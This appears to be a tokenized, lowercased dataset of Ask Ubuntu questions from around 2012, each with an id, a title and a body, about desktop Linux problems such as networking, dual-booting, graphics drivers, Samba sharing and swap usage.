211581	ca n't connect ( ssh , ftp , ... timeout ) to one computer on lan ( ping possible )	since i 've had a laptop ( a ) , i 've been trying to connect it with my desktop pc ( b ) via router in a lan , problem is ( b ) wo n't even answer any request aside from a ping . i 've tried ssh , ftp , vnc , samba , vpn and in each case , ( a ) wo n't be able to reach ( b ) but ( b ) is able to reach ( a ) 's severs just fine . i 've also tested this with an android device ( c ) and again ( b ) = > ( c ) but ( c ) =/= > ( b ) . a note on samba , i do n't know if it 's supposed to be a stable protocol but it 's kind of the exception , it does n't always connect ( b ) to ( a ) either . another thing is sometimes samba via nautilus sees there is a ( b ) machine but is always unable to mount it ... i 've tried a test of another post on the subject : booting ( b ) via a live cd . there everything works , from ftp to ssh and samba or vnc . so i followed another of his advices and tried to figure out if i ( b ) has a firewall . so far nothing seems to indicate it since by default there 's none , i do n't remember installing any and i checked my installed software for one . my questions would be : 1. how can i be sure i do n't have a firewall or any other type block , i can give you other details like iptables -- list output ( no idea what that is though ) . 2 . if you do n't think it 's that , what in hell could it be , i used to fault the ethernet of my mb but now i know it 's the drivers at most . looks to be software now and that gives me hope again . i 'll be checking this post to give you anything you need to answer . thanks for your help .
211584	ip being masked , mysteriously	i 'm running ubuntu with cinnamon . when checking my ip i noticed it is being masked . i have done nothing to set this , other than installing tor . but - i am not starting up tor , yet is it still running somehow , even from a reboot where i did not start tor . looking at my system with firestarter i see tor is running . how could tor ( or some aspects of it ) be running on it 's own ? how can i shut it off ? i see no mention of tor under system processes that are running .
211587	how to fix insta-crash on dual booting windows 8 from separate drive	i 've had ubuntu as the sole os on my desktop for a couple years . updated it to precise soon after it came out . today i decided to try dual booting to windows 8 . i bought a new , separate hard drive ( sata ) to install windows on . my ubuntu installation is on my older pata disk . i disconnected the ubuntu drive completely when installing windows . it seemed to go ok . i 've now re-attached the disk with ubuntu on it . i was able to boot to ubuntu , run update-grub , and see that it recognized windows 8 . i now have a windows 8 option in grub on startup . however , when i select that option i get a couple seconds of the windows boot screen , followed by a very brief flash of a `` your pc needs to restart '' error message ( see http : //i.stack.imgur.com/enztk.jpg ) , and then the computer spontaneously reboots , and i end up back at the grub screen . i 'm not sure what to try next . is this a windows security measure to prevent the os from being loaded by some malicious bootloader ? is the mysterious `` uefi '' somehow to blame ? have i missed something obvious ? edit : this seems to be the same problem as dual-boot windows 8 and ubuntu , separate hdd , win8 boot failure from grub , but the accepted answer there is to buy a $ 25 copy of easybcd and boot from windows . : (
211588	when i extract an application that i have downloaded , where should i be extracting them to ?	what do i type into the terminal to tell it where to go ? i do n't really understand how to move files using the terminal .
211593	after uninstalling ubuntu the boot entry is still there	i had an error during the install of ubuntu so when i uninstalled it , the boot entry was still there . i wish to attempt a reinstall , but this is not working , and i think the boot entry is the problem . i was installing ubuntu 12.10 , if that is of any importance . i had installed it on a windows 7 system .
211602	display artifacts under ubuntu 12.10	i am getting some display artifacts under a fresh install of 12.10 . ( open image in an another tab to get the full effect ) anyone have any idea what might be going on here or a possible solution ? my first assumption was display driver , but i 've been have some difficulties getting the nvidia binary driver to work . so i wanted to check for other possible solutions before i spend a lot of time messing with getting that to work .
211603	problems with nat adapater since upgrade to ubuntu 12.10	i was running ubuntu 12.04 w/ virtualbox installed . i was using the nat interface to connect to everything . basically running vbox for testing some things and a windows vm for netflix.. was back to working in my vms today and noticed that i was unable to connect to the internet . in the vm settings i 'm using the nat adapter , however i noticed there is no nat adapter in the network settings under preferences in vbox . not quite sure what happened but wonder what is going on ? i noticed there are some posts about changes dnsmasq and configuring a bridge mode , but this worked out of the box under 12.04 and since the upgrade this no longers work . need some help please
211608	why does ubuntu freezes on asus k42dy laptop with radeon hd6470m graphics card ?	hi , i have an asus k42dy laptop with amd phenom ii x2 , 8 gb ram , 500 gb hard drive and has a didicated ati radeon hd 6470m graphics card and i 'm running ubuntu 12.04 lts 64bit on it . i have installed gnome 3 and also followed this make ubuntu look like mac os x. i have also installed apps from the software center , getdeb & playdeb all of which worked fine . however , i noticed that ubuntu freezes after inactivity let 's say 1-3hrs . i have already set power setting to never standby or hibernate . this is completely annoying because all i can do is log-out via ctrl+alt+del or manually shut down and reboot my laptop . what should i do ? by the way , this happens on all shells unity , gnome ( even with the basic ) and cairo dock.i set swap space at 8gb during installation . any help will be appreciated . thanks !
211611	screen tearing with opened dash - nvidia geforce 8400 using nouveau driver	i 'm using ubuntu 12.10 quantal , on my dodgy vostro 1400 with nvidia geforce 8400 gs . since installation , i switch to nvidia driver and it works alright , but the windows performance is choppy , especially windows animation effects . disabling sync to vblank and compression make it works a bit smoother , but still unacceptable . at least there are no screen tearing and stuff . i decide to give nouveau driver , holy god the windows compiz effects are smooth butter . i was happy til i open the dash , when i realised the screen tearing all over , unless i close dash . the libgl1-mesa-dri-experimental package does not help . anyway to fix the screen tearing ? http : //i.stack.imgur.com/m8y5h.jpg http : //i.stack.imgur.com/aj8b0.png
211612	upgrading ubuntu to 12.04 stuck	while upgrading from 11.10 to 12.04 , i 'm stalled at the step : installing new version of config file /etc/init/udevtrigger.conf the terminal in the distribution upgrade window is expanded , there is no prompt for user input . i 've hit enter a few times but it does n't change anything but add a blank line after the last print statement . it 's been sitting for ~6 hours at this stage . no other windows or dialog boxes are open . the upgrade has progressed through `` preparing to upgrade '' , `` setting new software channels '' , and `` getting new packages '' . under the progress bar ( which estimates 1 day 2 hours remaining , and has for some time ) , it says preparing to configure libpcap0.8 . i 'd take a screen-shot , but it wo n't let me save the file anywhere . the progress bar is about 1/3 complete .
211617	how can i recover the compiz color filter plugin in ubuntu 12.10 ?	i had the compiz color filter plug-in in my ubuntu 12.04 then i upgraded to 12.10 and now it disappeared .
211623	how to make ubuntu ask for password when mounting partitions ?	i have been through this kind of feature in older versions of ubuntu . when i 'd like to mount a partition it will ask me a password . now i want to enable that kind of feature in ubuntu 12.04 . how can i achieve this ?
211625	systems not booting after ubuntu installation	i recently installed ubuntu on my pc dual-booted with windows 7 . after rebooting it went through the usual startup screens , but the os selection screen never shows up . i can not get either system to boot . i have formatted the partition holding the ubuntu to no avail and i really do n't want to get rid of windows . i am currently stuck using the live session disk to boot . any help is greatly appreciated .
211626	broadcom bcm4313 wireless slow and high-latency	ubuntu 12.10 64 bit on a dell latitude e6330 laptop . wireless is pretty slow . it gets connected quick enough , but then it acts like a dialup connection . my ssh sessions over wifi are slow and laggy . even browsing is slow , the pages are loading like it 's 1998 . this does not depend on the access point , it 's the same both at home and at work . other systems work fine on these access points . i had an older dell laptop before , different wifi hardware , and it was much faster over the same wireless access points . is this a known issue with this hardware ? if so , any solutions ?
211627	how to add support for the jpeg image format	after installing imagemagick , i 've tested it with jpg image , like this : identify 1.jpg but , i got this result : identify : no decode delegate for this image format `1.jpg ' @ error/constitute.c/readimage/550 . then , i tried to add support for jpeg format by : yum install libjpeg libjpeg-devel but , i got : setting up install process no package libjpeg available . no package libjpeg-devel available . nothing to do i thought i need to update the apt-get , i did : apt-get install libjpeg libjpeg-devel but , i got : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libjpeg e : unable to locate package libjpeg-devel is there an easy way to get those libraries installed ? i am using ubuntu 12.04 .
211628	keyboard not working correctly under ubuntu 12.10	i recently upgraded to 12.10 from 12.04 , i have a wireless microsoft keyboard and mouse ( both ise the same dongle ) my mouse works but the keyboard does n't ( it types random things ) but my wired keyboard works just fine , is there a fix for this ? sample : the quick brown fox jumps over the lazy dog ( wired keyboard ) 1zjvixmdlaydpujbcdiz1zwnefod2 ( i typed the same thing , but here 's what shows up )
211633	pdf files made using inkscape does not show everything when opened in windows	i made a small vector graphic using inkscape , converted it to pdf . then i opened the pdf in windows for printing purposes . many of the lines and curves i made in inkscape were missing . then i tried the same graphics in coreldraw . converted it to pdf . then i opened the file in ubuntu . all lines and curves were there . i want to use ubuntu for all my works . but this problem makes it difficult for me as i have to take the pdf to a printer who works only with windows .
211636	bootable usb drive wo n't run installation	i am having issues installing 12.10 on a laptop from bootable usb drive 4gb fat32 . also i changed order on bios to boot from usb . but only i see is the black screen with syslinux 4.06 edd 4.06-pre7 copyright ( c ) 1994-2012 h. peter anvin et al _ i tried to install 12.10 into my older laptop using the same bootable usb drive just to be sure , and it 's all works fine ! i have also trying different usb drives , but results were the same . so it looks like there is nothing wrong with my bootable usb drives . something is wrong with my laptop , but i ca n't figure out what exactly , because it 's very new and windows7 boots and runs just great . i googled but found nothing useful . my laptop is really a small one : acer aod270 protcessor : intel ( r ) atom ( tm ) cpu n26oo 1.60 ghz ram : 1 gb windows 7 starter 32 bit it has no cd drive any help would be really appreciated please . thank you guys for the help ! no , ekaj i am using universal usb installer-1.9.1.5 but i 'll try your variant , maybe it works ! @ arup roy chowdhury unfortunately it does n't work . for a few seconds i saw the screen with some basic information about computer , and then it just stuck on this : syslinux 4.06 edd 4.06-pre7 copyright ( c ) 1994-2012 h. peter anvin et al
211639	how to get sharing options to stick - ubuntu 12.04	i 'm having a really hard time trying to get my sharing set up on my 12.04 system . i 've tried both desktop version and server - i 'm a bit of a linux n00b , so i need a gui , command line is beyond me and no time to learn it ( not till after i get the shares setup , at least ) my problem is , whenever i try to set permissions in nautilus , it just reverts back to the default which is to `` none '' basically when i choose an option ... it does n't stick . i can create shares , and it asks me if i want to add permissions automatically - but they do not stick either . when i go to look at the shared folders in windows ( or even on my android phone , or mac ) it gives me permissions errors and does n't let me log in , despite me clicking `` allow guest access '' i have no idea what to do or where to go . i 've tried searching forums and google , and i 've tried everything i come across - no avail . i 've even tried mint builds to see if it 's different , no change there either . please help ! i really want to setup a server to share my media files and do backups in my house . thanks for your help !
211643	is there a video player working in nexus 7	is there a video player that will playback mp4s on the arm processor ? vlc gives me a black screen when it tries to play the video back
211644	i ca n't get ubuntu to work on my laptop	when i insert my disk and restart my laptop , it goes to the start up screen and says that my disk is corrupted or there is data missing and then requires that i start up with windows 7.i have tried the 32 bit and 64 bit and the 32 bit is corrupted and 64 bit wont play on my laptop . please help me .
211645	vlc-2.0.4 installation error ( lua )	i upgraded ubuntu 10.0 to 12.04 , install vlc2.0.3 via software center , but hd videos not plays perfectly..so i downloaded vlc-2.0.4 & installed through below command , but gives lua error , trendwise @ trendwise : ~/downloads/vlc-2.0.4 $ ./configure checking for lua ... no configure : warning : no package 'lua5.1 ' found , trying lua > = 5.1 instead checking for lua ... no configure : warning : no package 'lua ' found , trying manual detection instead checking lua.h usability ... no checking lua.h presence ... no checking for lua.h ... no checking lauxlib.h usability ... no checking lauxlib.h presence ... no checking for lauxlib.h ... no checking lualib.h usability ... no checking lualib.h presence ... no checking for lualib.h ... no checking for lual_newstate in -llua5.1 ... no checking for lual_newstate in -llua51 ... no checking for lual_newstate in -llua ... no configure : error : could not find lua . lua is needed for some interfaces ( rc , telnet , http ) as well as many other custom scripts . use -- disable-lua to ignore this error . i installed liblualib50 , liblua5.1.0 , liblua5.2.0 , but again gives error , which packages should i install ?
211648	kubuntu apt-get -f install error	i am seeing an error while running apt-get -f install . can somebody help me out .. venkat @ ubuntu : ~/downloads $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libjack-jackd2-0 suggested packages : jackd2 the following packages will be upgraded : libjack-jackd2-0 1 upgraded , 0 newly installed , 0 to remove and 256 not upgraded . 109 not fully installed or removed . need to get 0 b/197 kb of archives . after this operation , 3,072 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 274641 files and directories currently installed . ) preparing to replace libjack-jackd2-0 1.9.8~dfsg.1-1ubuntu1 ( using ... /libjack-jackd2- 0_1.9.8~dfsg.2-1precise1_amd64.deb ) ... unpacking replacement libjack-jackd2-0 ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2- 1precise1_amd64.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
211650	how do i remove all gnome environments i had added ?	i had installed the gnome de ... but it seemed quite laggy and thus removed it ... also removed the gnome-ppa n the de package , etc ... but in the log in menu , i still see `` gnome classic '' and `` gnome classic ( no effects ) '' how do i remove them too ?
211652	googling query from anywhere	some times when i am trying out stuff on my terminal , i get some blockade or some error to resolve which i have to copy the error or last message then open my browser and then google the query . is it possible for me that i select the message via mouse and when i right click i get a google it option as i get when i select some text on a browser ? ps : i am not asking how to do google search via terminal or how to browse web via terminal.these were the results i got when i goggled my question . what i want is something more general . whenever i select a piece of text i should get a `` google me '' option with the right click of my mouse ( or maybe with pressing of a key or something ) . i would prefer that the query takes place in a browser and not in a terminal .
211662	where can i find bluetooth received folder ?	i am able to setup a link with another laptop ( win 7 ) and even able to send files ( surprisingly around 3-4 mbps ) . but i am not able to locate where exactly the files are getting stored in my ubuntu 12.04 . is there anyway where i can setup the default folders for it .
211666	all memory not showing up with ubuntu-64 bit	i am only showing 5.8gb out of 9gb : harrison @ harrison-aurora : ~/desktop $ lshw -c memory warning : you should run this program as super-user . *-memory description : system memory physical id : 0 size : 5961mib but when i run lshw -c memory it show all 9gb : [ sudo ] password for harrison : *-firmware description : bios vendor : alienware physical id : 0 version : a10 date : 07/30/2010 size : 64kib capacity : 4032kib // other stuff here *-memory description : system memory physical id : a slot : system board or motherboard size : 9gib *-bank:0 description : dimm 1333 mhz ( 0.8 ns ) product : kp223c-eld vendor : kingston physical id : 0 serial : 43791b85 slot : dimm0 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : dimm 1333 mhz ( 0.8 ns ) product : ktw149-eld vendor : kingston physical id : 1 serial : b0953279 slot : dimm1 size : 1gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:2 description : dimm 1333 mhz ( 0.8 ns ) product : kp223c-eld vendor : kingston physical id : 2 serial : 7a381b2b slot : dimm2 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:3 description : dimm 1333 mhz ( 0.8 ns ) product : ktw149-eld vendor : kingston physical id : 3 serial : b0e63277 slot : dimm3 size : 1gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:4 description : dimm 1333 mhz ( 0.8 ns ) product : kp223c-eld vendor : kingston physical id : 4 serial : 7a3b1b2b slot : dimm4 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:5 description : dimm 1333 mhz ( 0.8 ns ) product : ktw149-eld vendor : kingston physical id : 5 serial : b0bf3277 slot : dimm5 size : 1gib width : 64 bits clock : 1333mhz ( 0.8ns ) how can i go about using all 9gb ?
211671	strange graphical error with kde	link to current progress which has been little unfortunately . http : //www.kubuntuforums.net/showthread.php ? 60891-weird-composition-error & p=314029 i am having a weird artifact and screen tearing issue . it is a very eratic issues as sometimes it is not there and other times is it every where . it happens a lot on right click menus . lspci -nnk | grep -ia2 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : dell device [ 1028:0551 ] kernel driver in use : i915 -- 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:11a0 ] ( rev ff ) 07:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) subsystem : dell device [ 1028:057b ]
211673	error : unknow filesystem	i am getting grub rescue promt > after reading the forum have realised that i have unknowingly deleted the grub that 's the reason i am not able to boot .. grub rescue > ls gives me hd0 hd0 , msdos5 hd0 , msdos3 hd0 , msdos2 hd0 , msdos1 to check which part has ubuntu i tried listing all but for all i get `` unknow filesystem '' please tell how should i resolve this ! !
211675	is it possible to find drivers for intel cedarview graphics controller to work with ubuntu 11.04 ?	i 've an asus netbook with this graphics card . the problem is that i can not set screen resolution to 1024x600 . the only available resolution , 800x600 , looks very bad . i 've read some answers to this problem in this forum , but all them are using ubuntu 12.04 . the only possibility to get my graphics card working with suitable drivers is to update my system to 12.04 ?
211679	system locks up , but accessible by ssh	i have been running a python script for extended amounts of time that relies on the pycuda module . on two occasions , the desktop has become locked up and totally unresponsive , except , oddly , through ssh . logging in remotely shows that the python script is no longer running when the system is ( locally ) locked up . because this python script runs for a long time , i have n't been around to see when exactly it locks up . it has never locked up without the script having run . running 12.04 with a geforce 460 gpu . the python script does n't make one cuda call that lasts for over an hour , but hundreds that last for less than 30 seconds , so i do n't think the gpu is locking up the system . thanks for any ideas .
211684	failed to partition my drive for installing dual boot windows	i am using ubuntu 10.04 as my operating system . i tried to install windows 7 along with ubuntu . to do so i inserted the windows cd and booted . when it asked for partitioning the drive , i clicked drive options `` advanced '' to partition . but then i could n't click on 'new ' and failed to create a partition . how can my problem be solved ?
211691	windows 7/ubuntu 12 dual boot deleted for windows 8 installation . how to make grub rescue go away ?	i had a windows 7/ubuntu 12 dual boot and i decided to clean install windows 8 over them . the problem is that after i deleted all partitions and installed windows i was getting an `` operation system not found '' , however after an `` enter '' the system will normally boot into windows 8 . i realized that windows did their trick and put the system ( not partition anymore ? ! ? ) `` tag '' ( disk management ) on my media hard drive . after trying to fix the boot/mbr to be able to boot from my main drive the `` operation system not found '' changed to the `` grub rescue > '' prompt . i know that i can not use that because i have killed the grub files . windows can still boot as long as i choose to boot from the media drive . the question is , is there any way to move the `` system '' , whatever it is now , to the main drive and have the pc boot from there , while making grub disappear ? and if that is possible after that , can i just make the media drive inactive or i will have to somehow remove the `` system '' tag ?
211692	how to remove terminal 's delay when working remotely	is it possible to avoid the delayed input when working remotely with the terminal ? ideally the delay caused by the network would occur once the command is entered/sent rather than each key input .
211693	why is my /dev/loop0 showing full ?	i have sufficent memory , but somehow i get my /dev/loop0 showing usage of 9 gb here 's my df-h. filesystem size used avail use % mounted on /dev/loop0 12g 10g 1.4g 88 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 785m 904k 784m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 1.9m 2.0g 1 % /run/shm /dev/sda6 20g 14g 6.4g 68 % /host /dev/sdb1 400m 4.5m 395m 2 % /media/label1 /dev/sdb2 3.3g 1.9g 1.2g 62 % /media/label2 /dev/sda5 175g 142g 33g 82 % /media/data i tried checking out what was in there . but that only cause a loadof gibberish to be printed on the terminal following which my system crashed . any help would be appreciated .
211696	read only file system	i 'm running ubuntu 12.10 , upon opening any shell i get the following error : /home/jack/.rbenv/libexec/rbenv-init : line 87 : can not create temp file for here-document : read-only file system i realised this was n't simply a rbenv issue , as any file i try to write to returns an error saying the system is read-only . i do n't know how else to describe my problem , each time i boot up the system goes through a disk check , where it supposedly fixes several errors in my disk . here is my /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=1cc4b2ab-a984-4516-ac25-6d64f5050244 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=4e0dfeae-701a-43ce-b5c6-65f15ab3d8e3 none swap sw 0 0 the entire file system is read-only . i 've tried the following sudo fsck.ext4 -f /dev/sda1 which gave the following ( shortened ) output /dev/sda1 : ***** file system was modified ***** /dev/sda1 : ***** reboot linux ***** /dev/sda1 : 1257080/45268992 files ( 1.0 % non-contiguous ) , 50696803/181051904 blocks
211697	ca n't load ubuntu after installing it	guys i was unable to find or understand what and how to do it , so i will ask . i know there are more questions like mine , but i did n't understand , so sorry . i have windows 7 installed on my laptop and i decided to install ubuntu 12.04 . the installation process was successful , but i ca n't start ubuntu.when i start my laptop windows 7 start automatically.i tried with live usb stick checked in ubuntu 's /etc/default/ oppened grub file and wrote grub_default = 2 , but nothing happend ... what i have to do to be able to choose which os to boot ? thank you guys .
211698	how to resize a folder name area in ubuntu 12.04 ?	i am having folders on my desktop . the folders names exceed the folders icons . so that makes me difficult to read the folder names whenever i align all folders in a same line . what i want is to re-size the folders name area to make it readable . is it possible ? p.s : the same requested for the file names also .
211700	how to use whatsapp mobile application on ubuntu touch ?	in my android i have `` whatsapp '' application running . but mobile freak i am not , and specially the mobile keyboards . so how can i run my same application , same account from my ubuntu desktop pc ? follow up : just to do keyboard routing , i have used wifikeyboard apps . which allows me to takeover the android input fields access via web link to type in my pc keyboard , and then it re-route the keys to mobile . features : allows me to copy and paste large texts to android input fields without using the keyboard of android but simply using my desktop pc , via web link http : //android.ip.address.goes.here : port/ allows me to have key submit which is similar to key press of mobile set itself at-least works without having mobile in rooted . hope it helps you ! !
211701	optirun fails in ubuntu 12.10	i am trying to use nvidia optimus on my laptop by using bumblebee , i have an intel core i5 with an nvidia geforce gt 630m . i have followed the instructions on the wiki page at https : //wiki.ubuntu.com/bumblebee , but when trying to run optirun with firefox ( or any other program , like glxspheres ) , i get the following error : [ 1921.452820 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 1921.452905 ] [ error ] aborting because fallback start is disabled . i have tried googling the issue but i could n't find any solution that did n't cause more problems . thank you for your time . here is my bumblebee.conf : http : //paste.ubuntu.com/1333324/
211702	camera input output at grub	though complete naive thought and may seem headless but i was thinking that is it possible ( by limited means ) to have my camera input in a small box @ grub boot screen where we have to select choices to select an os ?
211704	ubuntu tools for recovering data from damaged usb flash drive ~ 10 gb	i have technical issues with my usb flash drive - jetflash速v15 ( ts16gjfv15 ) it 's very critical situation because i can not see the data from it and i should get a way to recover them asap . so , in general , i have connected non-stop that usb flash disk at my laptop . was appear power surges and when i was coming back , i saw that problem with it . details regarding jetflash速v15 ( in present ) : - when i connect it on usp slot , the led is working intermittent and later on remain with constant light . - if i inspect the computer drivers , i found `` generic usb flash disk '' ( when the stick it 's connected ) . - if i inspect `` properties '' , i can see next details : -- - type : unknown ( application/octet-stream ) -- - size : unknown -- - volume : unknown -- - accessed : unknown -- - modified : unknown i inspected that stick on 2 different computers ( as well in different different usb ports ) and was the same problem , i can not see the content . i was checking with windows 7 and ubuntu 10.04 os , but without success . with both os was working before this issue . i 'll appreciate an answer which will solve the problem , not an answer which will certify the problem . what i have to do , to recover the information form it ( nearly 10 gb ) ? i 'm looking forward to be guided from a technical expert .
211705	ubuntu shares not visible on the network	i 've run into a strange thing . i just set up my brothers laptop with ubuntu 12.04 . i installed samba and shared his public folder in his /home by right click - > share this folder . i put in the correct workgroup ( javed-home ) in samba . the computer is able to access the ubuntu server and read its shares but when i tried to access his public folder from the server ... it gives an error `` failed to mount : unable to get share list from the server '' . here is the output of smbtree on brothers laptop : javed-home \\home-server home-server \\home-server\ml-2160-series samsung ml-2160 series \\home-server\ipc $ ipc service ( home-server ) \\home-server\toshiba \\home-server\saad saad 's personal storage \\home-server\data central storage area \\home-server\dvd-rw home-server asus dvd-rw \\home-server\print $ printer drivers \\dell-xps-l502x saad 's laptop \\dell-xps-l502x\public \\dell-xps-l502x\samsung-ml-2165-laserjet samsung ml-2165 laserjet ( hplj-pcl5e ) \\dell-xps-l502x\ipc $ ipc service ( saad 's laptop ) \\dell-xps-l502x\print $ printer driver` here is the output of testparm on his laptop : [ global ] workgroup = javed-home server string = saad 's laptop map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . username map = /etc/samba/smbusers unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 socket options = tcp_nodelay so_rcvbuf=262144 so_sndbuf=262144 iptos_lowdelay so_keepalive dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb [ printers ] comment = all printers path = /var/spool/samba create mask = 0700 printable = yes print ok = yes browseable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers i 'm not running any domain servers , all computers are users and part of the same workgroup .
211706	wireless is not activating on dell inspiron 5520	i have recently installed ubuntu 12.04 lts desktop amd 64 on my dell inspiron 5520 . it is not activating my wireless . maybe wireless drivers are not installed . i have already tried 11.10 but it was also not working for wireless . please help me to activate my wireless device .
211708	can i make all unix users samba users ?	i 'm trying to set up a samba share for the first time . my guest share works fine , but i can not seem to log in as any user . if i enter my unix username and password my mac window just shakes as if an incorrect password was entered . from what i have read , i thought that because i have security = user set in my smb.conf file , anyone with a unix account on my server would also be able to log into samba . do i still need to use smbpasswd to allow someone access ? is there an option i can set so that all unix accounts have an associated samba account , with the same password ? i believe unix password sync = yes helps with setting something up like that ?
211710	how do i hide panel handles ( `` hide buttons '' ) in gnome ?	i am running 11.04 and sometimes i need to take a screenshot of a full-screen application - and the gnome panels on top and bottom are usually in the way . so , i can click the `` hide buttons '' ( panel handles ? ) on left and right of each panel bar , and then the panel goes left or right - however , the handle itself is still visible , and `` always on top '' - so again it ends in the screenshot . is there any way to hide the panel handles completely ?
211714	installing ubuntu v12 on computer running windows me	i want to put ubuntu on a computer running windows me.i have the ubuntu cd that i purchased , but my computer will not boot to this disc . i can see the disc on my `` d '' drive and when i click on the installer nothing happens . it will not open the installer .
211716	add environment variable to .bashrc through script	i need to add the following lines to the end of .bashrc file in ubuntu . how can i add these lines automatically using a script . if i run the script , then it automatically inserts the lines at the end of .bashrc file . export app= '' /opt/tinyos-2.x/apps '' export tos= '' /opt/tinyos-2.x/tos ''
211719	pidgin not present in 12.10 repositories , how do i get one ?	i want to install pidgin on my 12.10 clean install system . when i go to the software center and try to install the client i get an error saying : - not found there isn’t a software package called “pidgin” in your current software sources . any ideas which repositories i need to import to get this done . error : - failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.10.6-0ubuntu1_all.deb 404 not found [ ip : 91.189.92.156 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.10.6-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.92.156 80 ]
211721	how to give wine / crossover games access to lan ?	i 'm trying to do lan gaming with crossover for linux , but my computer does n't ever get found by other players in my network , neither does it find other players itself . ( i tried with 2 games , battle for middle earth 2 and anno 1602 . ) is there a general method for achieving lan access for wine ?
211728	add platform to ubuntu	i am new in ubuntu ( come from windows 7 ) , i want to know how can i add environment variable in ubuntu , because the platform where i use exaggerate `` to compile and run sca composites with ow2 frascati , you also have to set the frascati_home system environment variable . frascati_home has to point to the directory where the ow2 frascati runtime distribution was extracted '' . and how can i add it to my path `` for conveniance , you can add frascati_home/bin to your path variable to get the frascati command available in the path '' . please i'am new , could you explain me what i do step by step..
211733	swap , swapiness and standby : swapping starts when waking up	i 'm running ubuntu 12.04 on a lenovo w500 ( core2duo t9400 , 4gb ram ) current kernel : 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 x86_64 x86_64 x86_64 gnu/linux -- but the problems exists since a couple of months , surviving quite a few software ( includig kernel ) updates i regularly put my machine into suspend-to-ram ( s3 ) and when the machine comes back up ubuntu starts to swap out processes . i was able to observe that the used swap-space starts to grow right after the box returns . see munin graphs below , the gap ( obviously ) shows the timeframe in str . needless to say that the box becomes unusable while swapping , load goes up beyond 10 . what i 've done so far : lowered swappiness from default ( 60 ) to 10 ( via /etc/sysctl.conf : vm.swappiness=10 ) -- this has improved the situation much , but sometimes the problem comes back , i have not found a trigger ( like memory usage ) for this for now lowered swappiness to 5 -- perhaps this has brought an improvement again before going to str the box ran stable without ( swapping ) problems for hours . today when the issue showed up again i used this script ( - > http : //stackoverflow.com/questions/479953/how-to-find-out-which-processes-are-swapping-in-linux ) to find what processes have the most used swap space . the result after the swap orgy is like that ( all pids with more than 10m usage ) : overall swap used : 2121344 kb ======================================== kb pid name ======================================== 439520 17491 java 208148 22719 firefox 136640 4337 /usr/bin/quodli 120852 5271 chrome 81832 5264 chrome 74284 17003 chrome 65368 16960 chrome 57088 3675 chrome 56184 30923 chrome 54412 11331 chrome 54264 3878 chrome 51508 18382 chrome 50088 3163 zeitgeist-fts 49772 15543 chrome 41344 15355 compiz 35040 1161 mysqld 32124 18374 chrome 30940 11339 chrome 30044 5752 chrome 28780 4235 plugin-containe 24576 31246 empathy-chat 23840 17703 chrome 22512 3207 ubuntuone-syncd 21588 1937 ntop 18336 2021 asterisk 17200 3915 chrome 13964 1935 xorg 12036 10679 chrome 11104 30782 empathy 11056 2889 python 10932 16565 knotify4 the java instance at the top is intellij . intellij , firefox and chrome also were all used right before the box was put to str . so my question is : can i somehow prevent these swapouts and why do they happen ? is it perhaps related to some misidentification of idle processes ? i 'm not looking for resolutions like : turn off swap buy more ram thanks in advance ! edit : further progression of memory usage , same day , broadly using the same apps all the time : edit2 ( resolved ) : i disabled my discrete ati card in the evening of nov. 20th and rebooted . the swap usage then dropped ( see the missing red area in the munin graph ) and did not reappear since then while the box did a couple of suspend/fully-on-cycles . the root cause seems to be amd 's ati fglrx driver ( catalyst ) for radeon ( radeon mobility hd 3650 in my case ) . https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/391628
211738	/etc/bash.bashrc executed but not ~/.bashrc	the bash man page says : '' when an interactive shell that is not a login shell is started , bash reads and executes commands from /etc/bash.bashrc and ~/.bashrc , `` i can see that bash.bashrc is executed because i put echo in it , but .bashrc is not . when i source manually .bashrc , it works fine . i have no .profile john @ build8 : ~ $ env term=xterm shell=/bin/bash ssh_client=192.168.0.202 45929 22 ssh_tty=/dev/pts/3 john @ build8 : ~ $ ps -o command $ $ $ ppid command sshd : john @ pts/3 -bash do you have any idea on what is wrong ? ? thank you .
